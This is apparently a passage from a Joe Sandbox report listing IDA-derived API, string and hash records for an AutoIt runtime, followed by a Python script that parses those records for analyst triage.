                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 01052C6A
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 01052CA0
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0106713C
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01067178
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010430B8
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010430F3
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        • __snwprintf.LIBCMT ref: 01054132
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __snwprintf_memmove
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 3506404897-2584243854
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01066D86
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01066D91
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        APIs
                                                                          • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                          • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                          • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        • GetWindowRect.USER32(00000000,?), ref: 01067296
                                                                        • GetSysColor.USER32(00000012), ref: 010672B0
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 01066FC7
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01066FD6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010431C9
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 010431E8
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 010528F8
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01052921
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        APIs
                                                                          • Part of subcall function 010586E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0105849D,?,00000000,?,?), ref: 010586F7
                                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 010584DD
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 2496851823-2422070025
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01039A2B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 6d753f872c76942b9ad21068a43bd7854651f8999202c1592dcf772ec6ece83d
                                                                        • Instruction ID: b3a9d836081059bd11aef4b925bbf8b154eb0865f9731164fda4bb6b8f9bf2b1
                                                                        • Opcode Fuzzy Hash: 6d753f872c76942b9ad21068a43bd7854651f8999202c1592dcf772ec6ece83d
                                                                        • Instruction Fuzzy Hash: 0601F571A41128EB8F14EBA4CC51CFE776DFF56320B000709F9E2672D0DB3558089650
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: 8b321290027181d8fa72deb5b70627f24320e457c7956f085e9b5eca9d56d98e
                                                                        • Instruction ID: ac6db4cb9af8ce503751e306c55b27d8e5b76d0a01959c064c6174123709ff55
                                                                        • Opcode Fuzzy Hash: 8b321290027181d8fa72deb5b70627f24320e457c7956f085e9b5eca9d56d98e
                                                                        • Instruction Fuzzy Hash: D701B9B29042587EEB19C6A8CC59EFE7BF89B15211F0041AEF592D61C1E5B5E6088B60
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 01039923
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: e190a776556f4817ddefc929092fb246d48886fd7e757490c7511ce47d99762e
                                                                        • Instruction ID: 8a11a4ebb530e954862293892c70d8a2c90dad06be56a17516f904af7fcb559b
                                                                        • Opcode Fuzzy Hash: e190a776556f4817ddefc929092fb246d48886fd7e757490c7511ce47d99762e
                                                                        • Instruction Fuzzy Hash: 74014772F41009ABCB14EBA4CC61EFF73ACEF51300F000019B9C273290DA144E08A6B0
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 010399A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 5cc335dfb14fbd021b26db833b438922770cfc0fed68eec50a1a55a5afddc9e8
                                                                        • Instruction ID: 832195217202930c68dbca7c5eb8797a3787794cf4509c7c5f3fd025783ba860
                                                                        • Opcode Fuzzy Hash: 5cc335dfb14fbd021b26db833b438922770cfc0fed68eec50a1a55a5afddc9e8
                                                                        • Instruction Fuzzy Hash: EF01DB72F41119A7DF10EBA8CD11EFF77ACAF55340F140116B9C573291DA694E089671
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: e38de1869adaf550b38406beb541d3458ef1fa4a9cba763b51a39716eccc796a
                                                                        • Instruction ID: c519800c9cf9757601467c583473eee4ffc8d9b649541987bda1fce1e4456677
                                                                        • Opcode Fuzzy Hash: e38de1869adaf550b38406beb541d3458ef1fa4a9cba763b51a39716eccc796a
                                                                        • Instruction Fuzzy Hash: A0E061329042291BD730A55DAC49FA7F7ECFB05731F000157FC84D7041D5609500C7D0
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010388A0
                                                                          • Part of subcall function 01003588: _doexit.LIBCMT ref: 01003592
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: 8b3125156cf69e325139da72f5ae0f0a373b891da01559c14f18e0e1ec263ca8
                                                                        • Instruction ID: 3d19277520df55fe095f82bb6f3b6000f20665cd041eedc7e049837882aecd5a
                                                                        • Opcode Fuzzy Hash: 8b3125156cf69e325139da72f5ae0f0a373b891da01559c14f18e0e1ec263ca8
                                                                        • Instruction Fuzzy Hash: 28D02B3138031C32E32132E96C1AFDB7A4C8F15B51F10402EFBC8B90C28DD6948042E4
                                                                        APIs
                                                                          • Part of subcall function 0101B544: _memset.LIBCMT ref: 0101B551
                                                                          • Part of subcall function 01000B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0101B520,?,?,?,00FE100A), ref: 01000B79
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00FE100A), ref: 0101B524
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FE100A), ref: 0101B533
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0101B52E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3158253471-631824599
                                                                        • Opcode ID: 4a7aec46e3c8b731f8208676235522ba4ba088d1fba23906c1cc731b1cdcdf65
                                                                        • Instruction ID: 6e3dd54a3b6665e73714f140706db80765817b425a8bdf55efabcc77cb7cf9b2
                                                                        • Opcode Fuzzy Hash: 4a7aec46e3c8b731f8208676235522ba4ba088d1fba23906c1cc731b1cdcdf65
                                                                        • Instruction Fuzzy Hash: 97E06D702047418BD330AF29E004B427AF4BF04744F008A5DE4C6CA349EBBAD444CB91
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 01020091
                                                                          • Part of subcall function 0105C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0102027A,?), ref: 0105C6E7
                                                                          • Part of subcall function 0105C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0105C6F9
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 01020289
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 582185067-3257408948
                                                                        • Opcode ID: 09aa78a63e8b2b19d358c2b759e231df3f768c284d04823f17b4640dc455a543
                                                                        • Instruction ID: b0a2222386433ed6408dbd9e9111ab1a2bf9711e010ad542c3840d0ae57d0cba
                                                                        • Opcode Fuzzy Hash: 09aa78a63e8b2b19d358c2b759e231df3f768c284d04823f17b4640dc455a543
                                                                        • Instruction Fuzzy Hash: ADF06D7190421ADFEB65DBA4C594BECBBF8AB08300F140485F286B2098CB796F80CF21
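The records above are the Joe Sandbox IDA plugin's per-function export for the AutoIt runtime mapped at 00FE0000 in process 28 (snapshot hcaresult_28_2_fe0000_Carter.jbxd). Triage is easier with the flattened text turned back into structured records, so what follows is an added example, my own code and not part of the Joe Sandbox report or of any Joe Security tool, that parses this record format and answers two questions an analyst asks of it: which functions reach a given API (directly or through a listed subcall), and which API names the code resolves at run time through GetProcAddress. The sample input is constructed from three records visible above, shortened to the lines the parser uses; the "Download File" suffix on the Associated lines is the page's own link residue, which the parser strips. Splitting call arguments on commas is a simplification of mine, since the export does not quote string arguments. Keeping the strings next to the API names matters here: the record that pairs IsDebuggerPresent with OutputDebugStringW and the "Unable to initialize critical section in CAtlBaseModule" text is the failure path of the ATL CAtlBaseModule constructor, not an anti-debugging check, and only the string makes that obvious.

```python
import re

# Constructed sample: three function records copied from the report's Joe Sandbox IDA
# plugin export above; Memory Dump Source and Similarity are cut down to the lines used here.
SAMPLE = """\
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010388A0
  • Part of subcall function 01003588: _doexit.LIBCMT ref: 01003592
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 8b3125156cf69e325139da72f5ae0f0a373b891da01559c14f18e0e1ec263ca8
APIs
  • Part of subcall function 0101B544: _memset.LIBCMT ref: 0101B551
  • Part of subcall function 01000B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0101B520,?,?,?,00FE100A), ref: 01000B79
• IsDebuggerPresent.KERNEL32(?,?,?,00FE100A), ref: 0101B524
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FE100A), ref: 0101B533
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0101B52E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• API String ID: 3158253471-631824599
• Opcode ID: 4a7aec46e3c8b731f8208676235522ba4ba088d1fba23906c1cc731b1cdcdf65
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 01020091
  • Part of subcall function 0105C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0102027A,?), ref: 0105C6E7
  • Part of subcall function 0105C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0105C6F9
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 01020289
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 09aa78a63e8b2b19d358c2b759e231df3f768c284d04823f17b4640dc455a543
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subcall>[0-9A-F]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")


def parse_records(text):
    """One dict per function; a record starts at every 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "source": {}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line:
            continue
        entry = line.lstrip("• ").strip()  # drop the bullet the report puts on every entry
        if section == "APIs":
            m = API_RE.match(entry)
            if m:
                # Arguments are unquoted in this export, so a comma inside a string literal
                # would split; none of the literals in the records above contains one.
                args = m["args"].split(",") if m["args"] is not None else []
                rec["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                    "ref": m["ref"], "subcall": m["subcall"]})
        elif section == "Strings":
            m = STRING_RE.match(entry)
            if m:
                rec["strings"].append((m["text"], m["xref"]))
        else:  # Memory Dump Source, IDA plugin and Similarity entries are 'Key: value' lines
            key, _, value = entry.partition(": ")
            if value.endswith("Download File"):  # residue of the report's download links
                value = value[:-len("Download File")]
            target = rec["similarity"] if section == "Similarity" else rec["source"]
            if key == "Associated":
                target.setdefault(key, []).append(value)
            else:
                target[key] = value
    return records


def functions_calling(records, api_name, include_subcalls=True):
    """Records that reach the named API directly or (optionally) through a listed subcall."""
    return [r for r in records if any(
        a["name"] == api_name and (include_subcalls or a["subcall"] is None) for a in r["apis"])]


def dynamic_imports(records):
    """(call site, symbol) for each GetProcAddress with a literal name: the APIs the
    code resolves at run time instead of importing statically."""
    return [(a["ref"], a["args"][1]) for r in records for a in r["apis"]
            if a["name"] == "GetProcAddress" and len(a["args"]) > 1 and a["args"][1] != "?"]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in functions_calling(recs, "IsDebuggerPresent"):
        print(r["similarity"]["Opcode ID"][:16], [s for s, _ in r["strings"]])
    print(dynamic_imports(recs))
```

Against the sample, `dynamic_imports` returns the single run-time lookup of GetSystemWow64DirectoryW (the AutoIt runtime's WoW64 path probe, guarded by LoadLibraryA/FreeLibrary in the record above), and `functions_calling(recs, "_memset", include_subcalls=False)` is empty because that call only appears as part of a subcall. For a whole report, feed the full export text in and group the records on the Opcode ID or Instruction Fuzzy Hash fields from `rec["similarity"]` to de-duplicate library functions across samples.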